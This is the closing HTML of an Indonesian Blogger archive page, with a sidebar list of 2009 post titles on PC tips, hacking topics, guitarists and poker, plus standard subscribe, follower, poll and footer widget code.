href='https://oret2-corat-coret.blogspot.com/2009/12/mengolah-foto-secara-online-dengan.html'>Mengolah Foto Secara Online Dengan BeFunky.com</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/mempercantik-desktop-dengan-rainmeter.html'>Mempercantik Desktop Dengan Rainmeter</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/belajar-menjadi-hacker.html'>Belajar Menjadi Hacker</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tips-trik-cmd.html'>Tips-Trik CMD</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/mengetahui-ip-address-pengirim-email.html'>Mengetahui IP Address Pengirim Email</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/network-security-apa-dan-bagaimana.html'>Network Security: Apa dan Bagaimana?</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/googling-dengan-google-hacks.html'>Googling Dengan Google Hacks</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/cek-ip-address-via-ip-adresscom.html'>Cek IP Address via ip-adress.com</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/membedah-file-msdossys.html'>Membedah file MSDOS.SYS</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/meningkatkan-keamanan-pc.html'>Meningkatkan Keamanan PC</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/source-code-virus_25.html'>Source Code Virus</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/source-code-virus.html'>Source Code Virus</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/enkripsi-untuk-keamanan-data-pada.html'>Enkripsi Untuk Keamanan Data Pada Jaringan</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/d-o-s.html'>D O S</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/internet-gratis.html'>Internet Gratis</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/cara-gampang-bikin-virus.html'>Cara Gampang Bikin Virus</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/algoritma-cek-digit-pada-kartu-kredit.html'>Algoritma Cek Digit Pada Kartu Kredit</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/konsep-ip-address-di-internet.html'>Konsep IP Address di Internet</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/cari-uang-di-internet.html'>Cari uang di internet</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-bikin-email-pakai-domain-pribadi.html'>Trik Bikin Email Pakai Domain Pribadi</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-menggerakkan-cursor-ketika-mouse.html'>Trik Menggerakkan Cursor Ketika Mouse Mati</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tutorial-berkreasi-dengan-windows-xp.html'>Tutorial Berkreasi dengan Windows XP</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/hot-tips-seputar-windows-xp.html'>Hot Tips Seputar Windows XP</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tips-memproteksi-task-manager.html'>Tips Memproteksi Task Manager</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tips-asyik-windows-7.html'>Tips Asyik Windows 7</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-upgrade-cepat-ke-windows-7-dari-xp.html'>Trik Upgrade Cepat ke Windows 7 dari XP atau Vista</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/daripada-membeli-computer-baru-ada-2.html'>Trik Bikin Multibooting Windows 7</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-buka-sistem-file-yang-diproteksi.html'>Trik Buka Sistem File yang Diproteksi</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/intip-trik-rahasia-di-balik-facebook.html'>Intip Trik Rahasia di Balik Facebook</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-mudah-percepat-kinerja-firefox.html'>Trik Mudah Percepat Kinerja Firefox</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/cara-mengembalikan-data-yang-hilang.html'>Cara Mengembalikan Data Yang Hilang??</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tips-cegah-pencurian-identitas-di.html'>Tips Cegah Pencurian Identitas di Facebok</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-mengendalikan-komputer-lain-tanpa.html'>Trik Mengendalikan Komputer Lain Tanpa Software</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/john-petrucci-profil.html'>JOHN PETRUCCI PROFIL</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/paul-gilbert-profil.html'>PAUL GILBERT-PROFIL</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/nama-lengkap-steven-siro-vai-website.html'>STEVE VAI PROFIL</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/arpeggio-basic.html'>ARPEGGIO-BASIC</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/nama-lengkap-joe-satriani-website-resmi.html'>JOE SATRIANI PROFIL</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/jalannya-sudah-tertatih-tatih-karena.html'>I B U</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/gini-nih-akibatnya-kalo-wartawan-salah.html'>Gini nih Akibatnya Kalo Wartawan Salah Ketik</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/kelakuan-cewe-sma-jaman.html'>Kelakuan Cewe SMA Jaman Sekarang,hehehehe</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/trik-poker-lagi.html'>TRIK POKER LAGI???</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/poker-chips-dan-trik.html'>Poker Chips dan Trik</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/dasar-desain-grafis.html'>dasar desain grafis</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/apa-sih-yang-paling-banyak-di-cari-di.html'>Apa Sih Yang Paling Banyak di Cari Di Search Engine ?</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/membuat-bse-lebih-menarik.html'>Membuat BSE Lebih Menarik</a></li> </ul> </li> </ul> </li> </ul> </div> </div> <div class='clear'></div> </div> </div><div class='widget Subscribe' data-version='1' id='Subscribe1'> <div style='white-space:nowrap'> <h2 class='title'>boz.boz</h2> <div class='widget-content'> <div class='subscribe-wrapper subscribe-type-POST'> <div class='subscribe expanded subscribe-type-POST' id='SW_READER_LIST_Subscribe1POST' style='display:none;'> <div class='top'> <span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'> <img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/> <img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Postingan </span> <div class='feed-reader-links'> <a class='feed-reader-link' href='https://www.netvibes.com/subscribe.php?url=https%3A%2F%2Foret2-corat-coret.blogspot.com%2Ffeeds%2Fposts%2Fdefault' target='_blank'> <img src='https://resources.blogblog.com/img/widgets/subscribe-netvibes.png'/> </a> <a class='feed-reader-link' href='https://add.my.yahoo.com/content?url=https%3A%2F%2Foret2-corat-coret.blogspot.com%2Ffeeds%2Fposts%2Fdefault' target='_blank'> <img src='https://resources.blogblog.com/img/widgets/subscribe-yahoo.png'/> </a> <a class='feed-reader-link' href='https://oret2-corat-coret.blogspot.com/feeds/posts/default' target='_blank'> <img align='absmiddle' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Atom </a> </div> </div> <div class='bottom'></div> </div> <div class='subscribe' id='SW_READER_LIST_CLOSED_Subscribe1POST' onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'> <div class='top'> <span class='inner'> <img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/> <span onclick='return(_SW_toggleReaderList(event, "Subscribe1POST"));'> <img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Postingan </span> </span> </div> <div class='bottom'></div> </div> </div> <div class='subscribe-wrapper subscribe-type-COMMENT'> <div class='subscribe expanded subscribe-type-COMMENT' id='SW_READER_LIST_Subscribe1COMMENT' style='display:none;'> <div class='top'> <span class='inner' onclick='return(_SW_toggleReaderList(event, "Subscribe1COMMENT"));'> <img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/> <img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Semua Komentar </span> <div class='feed-reader-links'> <a class='feed-reader-link' href='https://www.netvibes.com/subscribe.php?url=https%3A%2F%2Foret2-corat-coret.blogspot.com%2Ffeeds%2Fcomments%2Fdefault' target='_blank'> <img src='https://resources.blogblog.com/img/widgets/subscribe-netvibes.png'/> </a> <a class='feed-reader-link' href='https://add.my.yahoo.com/content?url=https%3A%2F%2Foret2-corat-coret.blogspot.com%2Ffeeds%2Fcomments%2Fdefault' target='_blank'> <img src='https://resources.blogblog.com/img/widgets/subscribe-yahoo.png'/> </a> <a class='feed-reader-link' href='https://oret2-corat-coret.blogspot.com/feeds/comments/default' target='_blank'> <img align='absmiddle' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Atom </a> </div> </div> <div class='bottom'></div> </div> <div class='subscribe' id='SW_READER_LIST_CLOSED_Subscribe1COMMENT' onclick='return(_SW_toggleReaderList(event, "Subscribe1COMMENT"));'> <div class='top'> <span class='inner'> <img class='subscribe-dropdown-arrow' src='https://resources.blogblog.com/img/widgets/arrow_dropdown.gif'/> <span onclick='return(_SW_toggleReaderList(event, "Subscribe1COMMENT"));'> <img align='absmiddle' alt='' border='0' class='feed-icon' src='https://resources.blogblog.com/img/icon_feed12.png'/> Semua Komentar </span> </span> </div> <div class='bottom'></div> </div> </div> <div style='clear:both'></div> </div> </div> <div class='clear'></div> </div><div class='widget Followers' data-version='1' id='Followers1'> <h2 class='title'>umat</h2> <div class='widget-content'> <div id='Followers1-wrapper'> <div style='margin-right:2px;'> <div><script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <div id="followers-iframe-container"></div> <script type="text/javascript"> window.followersIframe = null; function followersIframeOpen(url) { gapi.load("gapi.iframes", function() { if (gapi.iframes && gapi.iframes.getContext) { window.followersIframe = gapi.iframes.getContext().openChild({ url: url, where: document.getElementById("followers-iframe-container"), messageHandlersFilter: gapi.iframes.CROSS_ORIGIN_IFRAMES_FILTER, messageHandlers: { '_ready': function(obj) { window.followersIframe.getIframeEl().height = obj.height; }, 'reset': function() { window.followersIframe.close(); followersIframeOpen("https://www.blogger.com/followers.g?blogID\x3d5394344077739071592\x26colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByMwMDAwMDAiByMwMDAwMDAqByNGRkZGRkYyByMwMDAwMDA6ByMwMDAwMDBCByMwMDAwMDBKByMwMDAwMDBSByNGRkZGRkZaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26origin\x3dhttps://oret2-corat-coret.blogspot.com/"); }, 'open': function(url) { window.followersIframe.close(); followersIframeOpen(url); }, 'blogger-ping': function() { } } }); } }); } followersIframeOpen("https://www.blogger.com/followers.g?blogID\x3d5394344077739071592\x26colors\x3dCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByMwMDAwMDAiByMwMDAwMDAqByNGRkZGRkYyByMwMDAwMDA6ByMwMDAwMDBCByMwMDAwMDBKByMwMDAwMDBSByNGRkZGRkZaC3RyYW5zcGFyZW50\x26pageSize\x3d21\x26origin\x3dhttps://oret2-corat-coret.blogspot.com/"); </script></div> </div> </div> <div class='clear'></div> </div> </div><div class='widget Poll' data-version='1' id='Poll1'> <h2 class='title'>terserahlah mau jawab apa...</h2> <div class='widget-content'> <iframe allowtransparency='true' frameborder='0' height='160' name='poll-widget-1921503513516194137' style='border:none; width:100%;'></iframe> <div class='clear'></div> </div> </div></div> </li></ul> </div> <!-- /Sidebar --> <!-- Main Search --> <div id='rss_search'> <a class='rss' href='/feeds/posts/default' title='RSS Feed'></a> <form action='/search' id='mainsearchform' method='get'> <input class='submit' type='submit' value=''/> <input class='input' id='s' name='q' onfocus='doClear(this)' type='text' value='Search'/> </form> </div> <!-- /Main Search --> <!-- Red Light Blogger Template comes under a Creative Commons License. This means it is free to use on your blog as long as the credit link in the footer is kept intact BloggerStyles.com --> <div class='clear'></div> </div> </div> <!-- /Container --> <!-- Footer --> <script> document.write(unescape("%3Cdiv%20id%3D%27footer%27%3E%0A%0A%26%23169%3B%20%3Ca%20expr%3Ahref%3D%27data%3Ablog.homepageUrl%27%3E%3Cdata%3Ablog.title/%3E%3C/a%3E%20%7C%20%0A%0A%3C%21--%20credit%20--%3E%0AAuthored%20by%20%3Ca%20href%3D%27http%3A//www.templatelite.com/%27%3EWordpress%20Templates%3C/a%3E%20%7C%20%3Ca%20href%3D%27http%3A//www.bloggerstyles.com%27%3EBlogger%20Styles%3C/a%3E%20%7C%20%3Ca%20href%3D%27http%3A//www.falconhive.com%27%20target%3D%27_blank%27%20title%3D%27Falcon%20Hive%27%3EFree%20Premium%20Blogger%20Templates%3C/a%3E%09%7C%20%3Ca%20href%3D%22http%3A//www.weakcampus.com%22%3EWeakcampus%3C/a%3E%0A%0A%3C/div%3E")); </script> <!-- /Footer --> </div> <!-- /Base --> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/4290687098-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY6LZTLSBU5kmYAKd7XguBsCFxxq2g:1715536974895';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d5394344077739071592','//oret2-corat-coret.blogspot.com/2009/','5394344077739071592'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '5394344077739071592', 'title': 'cORat-coRet', 'url': 'https://oret2-corat-coret.blogspot.com/2009/', 'canonicalUrl': 'http://oret2-corat-coret.blogspot.com/2009/', 'homepageUrl': 'https://oret2-corat-coret.blogspot.com/', 'searchUrl': 'https://oret2-corat-coret.blogspot.com/search', 'canonicalHomepageUrl': 'http://oret2-corat-coret.blogspot.com/', 'blogspotFaviconUrl': 'https://oret2-corat-coret.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22cORat-coRet - Atom\x22 href\x3d\x22https://oret2-corat-coret.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22cORat-coRet - RSS\x22 href\x3d\x22https://oret2-corat-coret.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22cORat-coRet - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/5394344077739071592/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/a1ee13676d569430', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Bagikan ke Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'archive', 'pageName': '2009', 'pageTitle': 'cORat-coRet: 2009'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'cORat-coRet', 'description': '', 'url': 'https://oret2-corat-coret.blogspot.com/2009/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2009, 'rangeMessage': 'Menampilkan postingan dari 2009'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header1', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML9', 'main', document.getElementById('HTML9'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2309908549-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'main', document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'main', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ImageView', new _WidgetInfo('Image1', 'sidebar11', document.getElementById('Image1'), {'resize': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar11', document.getElementById('BlogSearch1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'sidebar11', document.getElementById('HTML4'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar11', document.getElementById('HTML8'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'sidebar11', document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar11', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML7', 'sidebar11', document.getElementById('HTML7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML10', 'sidebar11', document.getElementById('HTML10'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar22', document.getElementById('HTML2'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar22', document.getElementById('Profile1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar22', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Memuat\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_SubscribeView', new _WidgetInfo('Subscribe1', 'sidebar22', document.getElementById('Subscribe1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_FollowersView', new _WidgetInfo('Followers1', 'sidebar22', document.getElementById('Followers1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PollView', new _WidgetInfo('Poll1', 'sidebar22', document.getElementById('Poll1'), {'pollid': '-1921503513516194137', 'iframeurl': '/b/poll-results?pollWidget\x3dPoll1\x26hideq\x3dtrue\x26purl\x3dhttps://oret2-corat-coret.blogspot.com/'}, 'displayModeFull')); </script> </body></html>